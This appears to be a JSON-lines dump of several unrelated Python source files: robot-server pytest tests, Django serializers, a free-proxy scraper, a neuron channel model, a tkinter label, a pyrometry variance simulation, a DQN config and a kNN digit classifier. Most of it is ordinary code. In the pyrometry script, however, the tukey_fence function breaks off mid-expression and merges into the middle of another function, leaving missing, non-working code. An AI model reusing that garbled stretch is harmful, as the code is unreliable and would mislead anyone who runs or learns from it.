\\\n protocol_runner import ProtocolRunnerContext, ProtocolRunner\n\n\n@pytest.fixture\ndef mock_os_chdir():\n with patch.object(os, \"chdir\") as p:\n yield p\n\n\n@pytest.fixture\ndef uploaded_protocol_meta():\n mock_temp_dir = MagicMock()\n type(mock_temp_dir).name = PropertyMock(return_value=\"some_path\")\n return UploadedProtocolMeta(identifier=\"None\",\n protocol_file=FileMeta(\n path=Path(\"/some_path/abc.py\"),\n content_hash=\"\"\n ),\n directory=mock_temp_dir\n )\n\n\n@pytest.fixture\ndef mock_protocol(uploaded_protocol_meta):\n m = MagicMock(spec=UploadedProtocol)\n type(m).meta = PropertyMock(return_value=uploaded_protocol_meta)\n m.get_contents.return_value = \"my contents\"\n return m\n\n\n@pytest.fixture\ndef mock_context():\n with patch('robot_server.service.session.session_types.protocol'\n '.execution.protocol_runner.ProtocolRunnerContext') as p:\n yield p\n\n\n@pytest.fixture\ndef protocol_runner(mock_protocol, loop, hardware):\n return ProtocolRunner(protocol=mock_protocol,\n loop=loop,\n hardware=hardware,\n motion_lock=ThreadedAsyncLock())\n\n\ndef test_load(protocol_runner, mock_context,\n uploaded_protocol_meta, mock_protocol):\n with patch.object(Session, \"build_and_prep\") as mock:\n protocol_runner.load()\n mock_context.assert_called_once()\n mock.assert_called_once_with(\n name=uploaded_protocol_meta.protocol_file.path.name,\n contents=mock_protocol.get_contents(),\n hardware=protocol_runner._hardware,\n loop=protocol_runner._loop,\n broker=protocol_runner._broker,\n motion_lock=protocol_runner._motion_lock,\n extra_labware={})\n\n\n@pytest.mark.parametrize(argnames=\"func\",\n argvalues=[ProtocolRunner.run,\n ProtocolRunner.simulate,\n ProtocolRunner.cancel,\n ProtocolRunner.pause,\n ProtocolRunner.resume])\ndef test_no_session_will_not_raise(func, protocol_runner, mock_context):\n func(protocol_runner)\n mock_context.assert_not_called()\n\n\n@pytest.mark.parametrize(argnames=\"func,target\",\n argvalues=[[ProtocolRunner.run, \"run\"],\n [ProtocolRunner.simulate, \"refresh\"],\n [ProtocolRunner.cancel, \"stop\"],\n [ProtocolRunner.pause, \"pause\"],\n [ProtocolRunner.resume, \"resume\"]])\ndef test_session_calls(func, target, protocol_runner, mock_context):\n protocol_runner._session = MagicMock()\n func(protocol_runner)\n getattr(protocol_runner._session, target).assert_called_once()\n\n\ndef test_listeners(protocol_runner):\n results1 = []\n results2 = []\n protocol_runner.add_listener(results1.append)\n protocol_runner.add_listener(results2.append)\n protocol_runner._on_message(1)\n protocol_runner._on_message(2)\n assert results1 == [1, 2] == results2\n\n protocol_runner.remove_listener(results2.append)\n protocol_runner._on_message(3)\n assert results1 == [1, 2, 3]\n assert results2 == [1, 2]\n\n\ndef test_protocol_runner_context(mock_protocol, uploaded_protocol_meta,\n mock_os_chdir):\n with ProtocolRunnerContext(mock_protocol) as context:\n # We are changing directory to the temp directory\n mock_os_chdir.assert_called_with(\n uploaded_protocol_meta.directory.name\n )\n # Adding it to sys.path\n assert uploaded_protocol_meta.directory.name in sys.path\n\n # Done with context manager. 
Let's make sure we clean up\n assert uploaded_protocol_meta.directory.name not in sys.path\n assert sys.path == context._path\n mock_os_chdir.assert_called_with(context._cwd)\n","sub_path":"robot-server/tests/service/session/session_types/protocol/execution/test_protocol_runner.py","file_name":"test_protocol_runner.py","file_ext":"py","file_size_in_byte":4510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"81753093","text":"from rest_framework import serializers\nfrom restaurants.models import Restaurant, Item\nfrom django.contrib.auth.models import User\n\nclass RegisterSerializer(serializers.ModelSerializer):\n password = serializers.CharField(write_only=True)\n class Meta:\n model = User\n fields = ['username', 'email' ,'password']\n def create(self, validated_data):\n my_username = validated_data['username']\n my_email = validated_data['email']\n my_password = validated_data['password']\n new_user = User(username=my_username, email= my_email)\n new_user.set_password(my_password)\n new_user.save()\n return validated_data\n\nclass UserSerializer(serializers.ModelSerializer):\n class Meta:\n model = User\n fields = ['username', 'first_name', 'last_name', 'email',]\n\nclass ItemSerializer(serializers.ModelSerializer):\n class Meta:\n model = Item\n fields = ['name', 'description', 'price',]\n\nclass RestaurantListSerializer(serializers.ModelSerializer):\n detail = serializers.HyperlinkedIdentityField(\n view_name = \"api-detail\",\n lookup_field = \"id\",\n lookup_url_kwarg = \"restaurant_id\"\n )\n update = serializers.HyperlinkedIdentityField(\n view_name = \"api-update\",\n lookup_field = \"id\",\n lookup_url_kwarg = \"restaurant_id\"\n )\n delete = serializers.HyperlinkedIdentityField(\n view_name = \"api-delete\",\n lookup_field = \"id\",\n lookup_url_kwarg = \"restaurant_id\"\n )\n\n class Meta:\n model = Restaurant\n fields = [\n 'name',\n 'opening_time',\n 'closing_time',\n 'detail',\n 'update',\n 'delete',\n ]\n\n\nclass RestaurantDetailSerializer(serializers.ModelSerializer):\n update = serializers.HyperlinkedIdentityField(\n view_name = \"api-update\",\n lookup_field = \"id\",\n lookup_url_kwarg = \"restaurant_id\"\n )\n delete = serializers.HyperlinkedIdentityField(\n view_name = \"api-delete\",\n lookup_field = \"id\",\n lookup_url_kwarg = \"restaurant_id\"\n )\n owner = UserSerializer()\n items = serializers.SerializerMethodField()\n\n class Meta:\n model = Restaurant\n fields = [\n 'id',\n 'owner',\n 'name',\n 'description',\n 'opening_time',\n 'closing_time',\n 'update',\n 'delete',\n 'items',\n ]\n\n def get_items(self, obj):\n items = Item.objects.filter(restaurant=obj)\n item_list = ItemSerializer(items, many=True).data\n return item_list\n\nclass RestaurantCreateUpdateSerializer(serializers.ModelSerializer):\n class Meta:\n model = Restaurant\n fields = [\n 'name',\n 'description',\n 'opening_time',\n 'closing_time',\n ]","sub_path":"api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"184146968","text":"#-*- coding:utf-8 -*-\nimport requests\nimport bs4\nimport json\nimport re\nimport os\nimport threading\nimport time\nfrom implement_dt import Tackle_dt\n\nheaders = {\n 'User-Agent':'\"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) '\n 'AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20\",',\n}\n\n# 西刺代理\ndef fetch_xici():\n '''\n download ip from xici 
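`RegisterSerializer.create` in the file above returns `validated_data` instead of the saved `User`; the view may never look at the return value, but the conventional DRF pattern is to return the created instance. A sketch of that variant, assuming the same three fields:

```python
from django.contrib.auth.models import User
from rest_framework import serializers

class RegisterSerializer(serializers.ModelSerializer):
    password = serializers.CharField(write_only=True)

    class Meta:
        model = User
        fields = ['username', 'email', 'password']

    def create(self, validated_data):
        # create_user hashes the password and saves the row in one step
        return User.objects.create_user(**validated_data)
```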
website\n    '''\n    # connect to the database\n    tackle_dt = Tackle_dt()\n    url = 'http://www.xicidaili.com/wt'\n    page_content = requests.get(url,headers=headers)\n    str_content = page_content.text\n    soup = bs4.BeautifulSoup(str_content,'lxml')\n    # select all tr tags that contain an ip\n    tr_list = soup.find_all('tr',attrs={'class':['odd','']})\n    # compile the ip address regex\n    ip_rule = re.compile(r'(\\d{1,3}.\\d{1,3}.\\d{1,3}.\\d{1,3})')\n    # compile the ip port regex\n    port_rule = re.compile(r'\\>(\\d+)\\<')\n    for tr in tr_list:\n        str_tr = str(tr)\n        re_m = re.search(r'HTTP',str_tr)\n        if re_m:\n            dic1 = {}\n            # match the ip address\n            ip = re.findall(ip_rule,str_tr)[0]\n            # match the port\n            port = re.findall(port_rule,str_tr)[0]\n            # assemble into a usable proxy url\n            dic1[\"http\"] = \"http://\" + ip + \":\" + port\n            # verify that the ip works\n            if verify_ip(dic1):\n                # store it in the database once verified\n                tackle_dt.insert_ip(dic1)\n\n# =================================================================================\n\n# youdaili.net proxy site\ndef fetch_udaili():\n    '''Download IPs from the youdaili site'''\n    # connect to the database\n    tackle_dt = Tackle_dt()\n    # request and parse the page\n    url = 'http://www.youdaili.net/Daili/http/29487.html'\n    page_content = requests.get(url, headers=headers)\n    str_content = page_content.text\n    soup = bs4.BeautifulSoup(str_content, 'lxml')\n    p_tags = soup.find_all('p')\n    # match IPs\n    rule = re.compile(r'(\\d{1,3}.\\d{1,3}.\\d{1,3}.\\d{1,3}:\\d+)')\n    for p in p_tags:\n        try:\n            ip = re.findall(rule,str(p))[0]\n            dic = {}\n            if ip:\n                dic[\"http\"] = \"http://\"+ip\n                if verify_ip(dic):\n                    print(dic)\n                    tackle_dt.insert_ip(dic)\n\n        except Exception:\n            pass\n\n# =========================================================================\n# 66ip proxy site\n\nheaders1 = {\n    'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\n    'Accept-Encoding':'gzip, deflate, sdch',\n    'Accept-Language':'zh-CN,zh;q=0.8,zh-TW;q=0.6',\n    'Connection':'keep-alive',\n    'Cookie':'__cfduid=dc82e63a299dce97b98b94d949f5a9bb61484641816;'\n             ' CNZZDATA1253901093=1728273565-1484639487-http%253A%252F%252Fwww.baidu.com%252F%7C1484701785; '\n             'Hm_lvt_1761fabf3c988e7f04bec51acd4073f4=1484646251,1484646378,1484702884,1484703157; '\n             'Hm_lpvt_1761fabf3c988e7f04bec51acd4073f4=1484704429',\n    'Host':'www.66ip.cn',\n    'Referer':'http://www.66ip.cn/pt.html',\n    'Upgrade-Insecure-Requests':'1',\n    'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'\n    }\ndef fetch_ss():\n    tackle_dt = Tackle_dt()\n    url = 'http://www.66ip.cn/mo.php?tqsl=50'\n    page_content = requests.get(url, headers=headers1)\n    str_content = page_content.text\n    rule = re.compile(r'(\\d{1,3}.\\d{1,3}.\\d{1,3}.\\d{1,3}:\\d+)')\n    result = re.findall(rule,str_content)\n    for ip in result:\n        dic = {}\n        dic[\"http\"] = \"http://\"+ip\n        if verify_ip(dic):\n            print(dic)\n            tackle_dt.insert_ip(dic)\n\n\n# initial check that an ip is usable\ndef verify_ip(dic):\n    proxies = dic\n    fixed_url = 'http://www.baidu.com/'\n    try:\n        res = requests.get(fixed_url,proxies=proxies,timeout=2)\n        # print(res.text)\n        if 'STATUS OK' in res.text:\n            return True\n        else:\n            return False\n    except Exception:\n        return False\n\n# multithreading\nfuncs = [fetch_xici,fetch_udaili,fetch_ss]\ndef download_ip():\n    print('begin crawling ip')\n    threads = []\n    for i in range(len(funcs)):\n        t = threading.Thread(target=funcs[i])\n        threads.append(t)\n    for i in range(len(funcs)):\n        threads[i].start()\n    for i in range(len(funcs)):\n        threads[i].join()\n    print('finish crawling ip')\n\n\ndownload_ip()\n# if __name__ == '__main__':\n#     while True:\n#         print('crawling...')\n#         main()\n#         print('resting...')\n#         # rest for one minute\n# 
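`verify_ip` above decides a proxy is alive by searching the Baidu homepage for the string 'STATUS OK', which silently fails once the page changes. A sketch of a status-code-based probe (same test URL and timeout; the function name is new):

```python
import requests

def verify_proxy(proxy, test_url='http://www.baidu.com/', timeout=2):
    """Return True when a probe request through the proxy succeeds."""
    try:
        res = requests.get(test_url, proxies=proxy, timeout=timeout)
        return res.status_code == 200
    except requests.RequestException:
        return False
```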
time.sleep(60)\n","sub_path":"crwal_recuit_websites/fetch_ip.py","file_name":"fetch_ip.py","file_ext":"py","file_size_in_byte":4643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"553682905","text":"# exec(open('../../Compilations/Kinetics/K_D_Chan_Custom1.py').read())\n#KD channel taken from mod files of Migliore2018: kdb.mod\n# Problems:\n\nimport numpy as np\nimport pickle\nimport pandas as pd\nimport moose\nimport matplotlib.pyplot as plt\n\n#######################################################################\nn_vhalf_inf, n_slope_inf, n_A, n_B, n_C, n_D, n_E, n_F = -0.033,-0.0087666, -3.28572168e-02, 3.39951757e-02, 2.08825526e-17, 8.37522423e-14, 1.65077372e-02, 4.08034957e-01\n\n#######################################################################\n\nSOMA_A = 3.14e-8\nF = 96485.3329\nR = 8.314\ncelsius = 32\ndt = 0.05e-3\nENa = 0.092\nEK = -0.099\nEh = -0.030\nECa = 0.140\nEm = -0.065\n\nVmin = -0.100\nVmax = 0.100\nVdivs = 3000\n# dV = (Vmax-Vmin)/Vdivs\n# v = np.arange(Vmin,Vmax, dV)\nv = np.linspace(Vmin,Vmax, Vdivs)\nCamin = 1e-12\nCamax = 3\nCadivs = 4000\n# dCa = (Camax-Camin)/Cadivs\n# ca = np.arange(Camin,Camax, dCa)\nca = np.linspace(Camin,Camax, Cadivs)\n\ndef ChanGate(v,vhalf_inf, slope_inf, A, B, C, D, E, F):\n # alge model\n Inf = 1/(1+np.exp((v-vhalf_inf)/-slope_inf))\n yl = (v-A)/-B\n yr = (v-A)/E\n Tau = (C + (1 + yl/(np.sqrt(1+yl**2)))/2) * (D + (1 + yr/(np.sqrt(1+yr**2)))/2) * F\n Tau[Tau<0.00002] = 0.00002\n return [Inf,Tau]\n\ndef K_D_Chan(name):\n K_D = moose.HHChannel( '/library/' + name )\n K_D.Ek = EK\n K_D.Gbar = 300.0*SOMA_A\n K_D.Gk = 0.0\n K_D.Xpower = 1.0\n K_D.Ypower = 0.0\n K_D.Zpower = 0\n\n [nInf,nTau] = ChanGate(v,*[n_vhalf_inf, n_slope_inf, n_A, n_B, n_C, n_D, n_E, n_F])\n\n xgate = moose.element( K_D.path + '/gateX' )\n xgate.min = Vmin\n xgate.max = Vmax\n xgate.divs = Vdivs\n xgate.tableA = nInf/nTau\n xgate.tableB = 1.0/nTau\n\n return K_D\n\n\nif __name__ == \"__main__\":\n [nInf,nTau] = ChanGate(v,*[n_vhalf_inf, n_slope_inf, n_A, n_B, n_C, n_D, n_E, n_F])\n plt.figure()\n plt.plot(v, nInf, label='nInf')\n plt.ylabel('Inf')\n plt.legend()\n plt.figure()\n plt.plot(v, nTau, label='nTau')\n plt.ylabel('Tau')\n plt.legend()\n plt.show()","sub_path":"Kinetics/K_D_Chan_Custom2.py","file_name":"K_D_Chan_Custom2.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"482514787","text":"import tkinter as tk\nimport psutil\nfrom InputFunctions import get_car_info, get_lap_info\n\n\ndef counter_label(textlabel):\n def count():\n textlabel.config(text=str(get_car_info()[3]))\n textlabel.after(1, count)\n\n count()\n\n\nroot = tk.Tk()\nroot.title(\"CruiseControl Info\")\nlabel = tk.Label(root)\nlabel.pack()\ncounter_label(label)\nroot.mainloop()\n","sub_path":"neuro/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"379544523","text":"# MIT License\n# \n# Copyright (c) 2020 Pierre-Yves Camille Regis Taunay\n# \n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom 
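In `K_D_Chan` above, `gateX` is filled with `tableA = nInf/nTau` and `tableB = 1.0/nTau`, MOOSE's `(alpha, alpha+beta)` encoding for a Hodgkin-Huxley gate. The toy check below (made-up values) shows how the steady state and time constant are recovered from the two tables:

```python
import numpy as np

nInf = np.array([0.1, 0.5, 0.9])       # toy steady-state values
nTau = np.array([0.02, 0.01, 0.005])   # toy time constants, seconds

tableA = nInf / nTau    # alpha
tableB = 1.0 / nTau     # alpha + beta

assert np.allclose(tableA / tableB, nInf)  # Inf = alpha / (alpha + beta)
assert np.allclose(1.0 / tableB, nTau)     # Tau = 1 / (alpha + beta)
```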
the Software is\n# furnished to do so, subject to the following conditions:\n# \n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n# \n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n'''\nFile: compare_variance_approximations\n\nDescription: Calculate the variance and standard error with or without an\nasymptotic expansion.\n\nThis file generates Fig. 4 in our 2020 RSI Journal article.\n'''\n\nimport itertools\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.stats import norm, iqr\n\nC1 = 1.191e16 # W/nm4/cm2 Sr\nC2 = 1.4384e7 # nm K\n\ndef wien_approximation(wl,T,f_eps):\n    '''\n    Function: wien_approximation\n    Calculates the Wien approximation to Planck's law for non-constant emissivity\n    Inputs:\n        - wl: wavelength in nm\n        - T: temperature in K\n        - f_eps: a lambda function representing the emissivity as function of\n        temperature and wavelength\n    '''\n    eps = f_eps(wl,T) # Emissivity\n\n    return eps * C1 / wl**5 * np.exp(-C2/(T*wl))\n\ndef tukey_fence(Tvec, delta=31.3):\n    '''\n    Function: tukey_fence\n    Description: Removes outliers using Tukey fencing\n    Inputs:\n        - Tvec: some vector\n        - delta: a fencing value above/below the third/first quartile,\n        respectively. Values outside of [Q1 - delta * IQR, Q3 + delta*IQR] are\n        discarded\n    Outputs:\n        - Average of vector w/o outliers\n        - Standard deviation of vector w/o outliers\n        - Standard error of vector w/o outliers (%)\n        - Vector w/o outliers\n    '''\n    ### Exclude data w/ Tukey fencing\n    T_iqr = iqr(Tvec)\n    T_qua = np.percentile(Tvec,[25,75])\n\n    min_T = T_qua[0] - delta * T_iqr\n    max_T = T_qua[1] + delta * T_iqr\n\n    T_left = Tvec[(Tvec>min_T) & (Tvec<max_T)]\n\n    # NOTE: the tail of this function, moving_average, and the head of\n    # generate_Taverage_distribution were lost to markup stripping; they are\n    # reconstructed below from the docstring above and the call sites.\n    Tave = np.average(T_left)\n    Tstd = np.std(T_left)\n    Tmetric = Tstd/Tave*100\n\n    return Tave, Tstd, Tmetric, T_left\n\ndef moving_average(data, wdw):\n    '''Simple moving average over a window of wdw points (reconstructed).'''\n    return np.convolve(data, np.ones(wdw)/wdw, mode='valid')\n\n### Emissivity model: gray body (assumed; the original definition was lost)\ngr_eps = lambda wl,T: 1.0 * np.ones(len(wl))\n\ndef generate_Taverage_distribution(sigma_I,T0,wl_vec,nwl,wdw,wdwo2,ntbar):\n    '''\n    Generates ntbar Monte-Carlo samples of the relative error of the average\n    two-color temperature Tbar (signature recovered from the call site below).\n    Inputs:\n        - sigma_I: standard deviation of the measurement noise\n        - T0: true temperature\n        - wl_vec: wavelength vector in nm\n    '''\n    data = {}\n    Tbar_dist = np.zeros(ntbar)\n\n    for idx in range(ntbar):\n        ### Generate a noisy spectrum and take its logarithm\n        I_calc = wien_approximation(wl_vec,T0,gr_eps)\n        noisy_data = np.random.normal(I_calc, sigma_I*I_calc)\n        log_noisy = np.log(noisy_data)\n\n        ### Moving-average filter\n        if wdwo2 > 0:\n            log_noisy = moving_average(log_noisy,wdw)\n\n            # Rearrange the indices\n            lwl_vec = wl_vec[wdwo2:-wdwo2]\n        else:\n            lwl_vec = np.copy(wl_vec)\n\n        ### Index of the vectors\n        vidx = np.arange(0,nwl,1)\n        vidx = np.array(vidx,dtype=np.int64)\n\n        ### Generate combinations\n        cmb_pix = []\n\n        for i,j in itertools.combinations(vidx,2):\n            cmb_pix.append([i,j])\n        cmb_pix = np.array(cmb_pix)\n\n        ### Which wavelengths are associated with the pixel combinations?\n        wl_v0 = lwl_vec[cmb_pix[:,0]]\n        wl_v1 = lwl_vec[cmb_pix[:,1]]\n\n        ### Calculate intensity ratio\n        logIi = log_noisy[cmb_pix[:,0]]\n        logIj = log_noisy[cmb_pix[:,1]]\n\n        logR = (logIi-logIj)\n\n        # No emissivity error, so we can calculate eps1 and eps0 directly\n        # from the given emissivity function\n        eps0 = gr_eps(wl_v0,1)\n        eps1 = gr_eps(wl_v1,1)\n\n        invT = logR - 5*np.log(wl_v1/wl_v0) - np.log(eps0/eps1)\n        That = 1/invT\n        That *= C2 * (1/wl_v1 - 1/wl_v0)\n\n        # Filter out outliers\n        Tave, Tstd, Tmetric, Tleft = tukey_fence(That)\n\n        ### Average of all Thats is the estimate of the true temperature\n        Tave = np.average(Tleft)\n\n        ### Distributions\n        Tbar_dist[idx] = (Tave - T0)/T0\n\n    data['Icalc'] = np.copy(I_calc)\n    data['noisy_data'] = np.copy(noisy_data)\n    data['log_noisy'] = np.copy(log_noisy)\n    data['cmb_pix'] = np.copy(cmb_pix)\n    data['wl_v0'] = np.copy(wl_v0)\n    data['wl_v1'] = np.copy(wl_v1)\n\n    R 
= np.max(wl_v1)/np.min(wl_v0) - 1\n data['R'] = R\n data['lambda1'] = np.min(wl_v0)\n data['lambdaN'] = np.max(wl_v1)\n data['Nwl'] = nwl\n data['Nthat'] = (int)(nwl*(nwl-1)/2)\n data['T0'] = T0\n data['Tbar'] = np.copy(Tbar_dist)\n data['That'] = np.copy(That)\n \n return data\n\n\ndef compute_high_order_variance(sigma_I,T0,nwl,wdw,wdwo2,data): \n '''\n Calculates the variance from the successive Taylor expansions. We keep\n high orders for all of the expansions.\n Inputs:\n - T0: true temperature\n - sigma_I: standard variation on the measurement noise\n '''\n wl_v1 = data['wl_v1'] \n wl_v0 = data['wl_v0']\n I_calc = data['Icalc']\n cmb_pix = data['cmb_pix']\n \n # Number of combinations\n ncomb = len(wl_v1)\n \n ### Denominator average and variance for all wavelengths\n # mud, sigd\n mud = np.zeros(ncomb)\n logI = np.log(I_calc)\n \n # Filtering effect on mu_d\n logI = moving_average(logI,wdw)\n \n mud = logI[cmb_pix[:,0]] - logI[cmb_pix[:,1]]\n \n # No epsilon here: we assumed constant emissivity\n mud += - 5*np.log(wl_v1/wl_v0)\n \n sigd = np.ones_like(mud) * np.sqrt(2/wdw)*sigma_I\n mudmin = np.min(np.abs(mud))\n \n # sigma_d / mu_d\n ratio = np.unique(sigd) / mudmin\n ratio = np.abs(ratio)\n \n ### muThat, sigThat\n muThat = np.zeros_like(mud)\n sigThat = np.zeros_like(mud)\n \n # Teq\n Teq = C2*(1/wl_v1-1/wl_v0) / mud\n \n # Taylor expansion for muThat: we want to find the \"best\" order in the \n # expansion of the mean of 1/X\n sigomud = sigd/mud\n sigomud2 = sigomud**2\n \n muThat = Teq/T0 \n \n # Taylor expansion for sigThat: we keep only the first two orders\n sigThat = (Teq/T0)**2 * sigomud2 * (1 + 2*sigomud2)\n sigThat = np.sqrt(sigThat)\n \n ### muTbar, sigTbar\n # muTbar: subtract 1 bc. we want (Tbar-T0)/T0 = Tbar/T0 - 1\n muTbar = 1/ncomb * np.sum(muThat) - 1\n \n # sigTbar\n sigTbar = 1/ncomb**2 * np.sum(sigThat**2)\n sigTbar = np.sqrt(sigTbar)\n \n \n return muTbar,sigTbar,ratio,muThat,sigThat\n\n\n### Input parameters\nntbar = 1000 # Number of samples for Monte-Carlo\nT0 = 1500\nsigma_I = 0.01\nwdw = 1 # window size\nwdwo2 = (int)((wdw-1)/2)\n\n# Wavelengths\nwlRange = 1.46\n\n# Holder for results\nres = []\n\nfor lambda1 in np.array([300]):\n lambdaN = (1+wlRange) * lambda1\n \n ### Approximate the starting point \n sigd = np.sqrt(2/wdw) * sigma_I\n rlim = 0.1\n Napprox = 1\n Napprox += C2 / (T0*lambda1) * wlRange / (1+wlRange)**2 * rlim / sigd\n \n nwl_array = np.arange(10,100,10)\n nwl_array = np.array(nwl_array,dtype=np.int64)\n print(\"Napprox = \", Napprox)\n\n for idx,nwl in enumerate(nwl_array):\n \n if np.mod(idx,10) == 0:\n print(idx)\n \n wl_vec = np.linspace(lambda1,lambdaN,nwl) \n \n dlambda = np.abs(wl_vec[0]-wl_vec[1])\n \n # Add window for moving average\n wl_vec = np.linspace(lambda1 - wdwo2 * dlambda, \n lambdaN + wdwo2 * dlambda, \n nwl + wdw - 1)\n \n ### Create some data\n data = generate_Taverage_distribution(sigma_I, \n T0,\n wl_vec,\n nwl,\n wdw,\n wdwo2,\n ntbar)\n muds,sigds = norm.fit(data['Tbar'])\n \n ### Calculate the variance based on the second-order accurate expansions\n muAcc, sigAcc, ratio, muThat, sigThat = compute_high_order_variance(sigma_I,T0,nwl,wdw,wdwo2,data)\n \n res.append([C2/(T0*lambda1), # 0\n nwl, # 1 \n dlambda, # 2\n ratio, # 3 \n sigds, # 4\n sigAcc, # 5\n muds * 100, # 6\n muAcc * 100]) # 7\n\nres = np.array(res)\n\nfig, ax = plt.subplots(2,1)\n\nax[0].vlines(Napprox,np.min(res[:,5]),np.max(res[:,5]),linestyles='--')\nax[0].plot(res[:,1],res[:,4],'^')\nax[0].plot(res[:,1],res[:,5])\nax[0].set_ylabel(\"Standard 
deviation\")\n\nax[1].plot(res[:,1],res[:,6],'^')\nax[1].plot(res[:,1],res[:,7])\nax[1].set_ylabel(\"Error of the mean (%)\")","sub_path":"article/compare_variance_approximation.py","file_name":"compare_variance_approximation.py","file_ext":"py","file_size_in_byte":10466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"553277611","text":"from rllab.algos.dqn_2 import DQN\nfrom rllab.envs.box2d.cartpole_env import CartpoleEnv\nfrom rllab.envs.normalized_env import normalize\nimport gym\n\nenv_name = 'Breakout-v0'\nenv = gym.make(env_name)\n\nalgo = DQN(\n env=env,\n env_name=env_name,\n frame_width=84, # Resized frame width\n frame_height=84, # Resized frame height\n num_episodes = 12000, # Number of episodes the agent plays\n state_length = 4, # Number of most recent frames to produce the input to the network\n gamma = 0.99, # Discount factor\n exploration_steps = 1000000, # Number of steps over which the initial value of epsilon is linearly annealed to its final value\n initial_epsilon = 1.0, # Initial value of epsilon in epsilon-greedy\n final_epsilon = 0.1, # Final value of epsilon in epsilon-greedy\n initial_replay_size = 20000, # Number of steps to populate the replay memory before training starts\n num_replay_memory = 400000, # Number of replay memory the agent uses for training\n batch_size = 32, # Mini batch size\n target_update_interval = 10000, # The frequency with which the target network is updated\n train_interval = 4, # The agent selects 4 actions between successive updates\n learning_rate = 0.00025, # Learning rate used by RMSProp\n momentum = 0.95, # Momentum used by RMSProp\n min_grad = 0.01, # Constant added to the squared gradient in the denominator of the RMSProp update\n save_interval = 300000, # The frequency with which the network is saved\n no_op_steps = 30, # Maximum number of \"do nothing\" actions to be performed by the agent at the start of an episode\n load_network = False,\n save_network_path = './saved_networks/' + env_name,\n save_summary_path = './summary/' + env_name,\n)\nalgo.train()\n","sub_path":"examples/dqn_2.py","file_name":"dqn_2.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"175866424","text":"from kNN.kdTree import kdtree\nimport kNN\nimport numpy as np\n\nx1=[]\ny1=[]\nnums=[189, 198, 195, 199, 186, 187, 195, 201, 180, 204]\nfile=\"C:\\\\Users\\\\45530\\\\Desktop\\\\ml code\\\\MLiA_SourceCode\\\\machinelearninginaction\\\\Ch02\\\\digits\\\\trainingDigits\\\\\"\n\nfor i in range(10):\n for j in range(nums[i]):\n num_arr=[]\n filename=file+\"{}_{}.txt\".format(i,j)\n with open(filename, 'r') as file_to_read:\n while True:\n line=file_to_read.readline()\n if not line:\n break\n line=line[:len(line)-1]\n t=[float(i) for i in line]\n num_arr.append(t)\n num_arr=np.array(num_arr)\n num_arr=num_arr.flatten()\n x1.append(list(num_arr))\n y1.append(i)\n \nx1=np.array(x1)\ny1=np.array(y1)\n\nx2=[]\ny2=[]\nnums=[87, 97, 92, 85, 114, 108, 87, 96, 91, 89]\nfile=\"C:\\\\Users\\\\45530\\\\Desktop\\\\ml code\\\\MLiA_SourceCode\\\\machinelearninginaction\\\\Ch02\\\\digits\\\\testDigits\\\\\"\n\nfor i in range(10):\n for j in range(nums[i]):\n num_arr=[]\n filename=file+\"{}_{}.txt\".format(i,j)\n with open(filename, 'r') as file_to_read:\n while True:\n line=file_to_read.readline()\n if not line:\n break\n line=line[:len(line)-1]\n t=[float(i) for i in line]\n num_arr.append(t)\n num_arr=np.array(num_arr)\n 
num_arr=num_arr.flatten()\n x2.append(list(num_arr))\n y2.append(i) \nx2=np.array(x2)\ny2=np.array(y2)\n\nsum=len(x2)\ncorrect=0\nwrong=0\nk=5\n\nT=kdtree(x1,y1)\nT.kdtreeinit(T.root,0)\n\nfor i in range(len(x2)):\n res=T.knn_predict(k,x2[i])\n if res==y2[i]:\n correct+=1\n else:\n wrong+=1\n print(\"{}-th is predicted as {}, actually is {}\".format(i,res,y2[i]))\nprint(\"correct rate is {:.2f}%\".format(correct/sum*100))\n \n\n\n\n","sub_path":"kNN/knn_digit.py","file_name":"knn_digit.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"159912158","text":"#!/usr/bin/env python\n\"\"\"\nScript Header\n\n$Id: cmPROV20528_3pcc_IPv6_Resync_Web_ProfileRule.py\n\nCopyright (c) 2016-2017 Cisco Systems, Inc.\n\nName:\n cmPROV20528_3pcc_IPv6_Resync_Web_ProfileRule.py\n\nReferences:\n Tph10164330c\n Tph10163009c\n Tph10162951c\n\nPurpose:\n To test the resync using different methods in DUAL Mode\n with IPv6 address\n\nAuthor:\n yuzho2@cisco.com\n\nReferences:\n 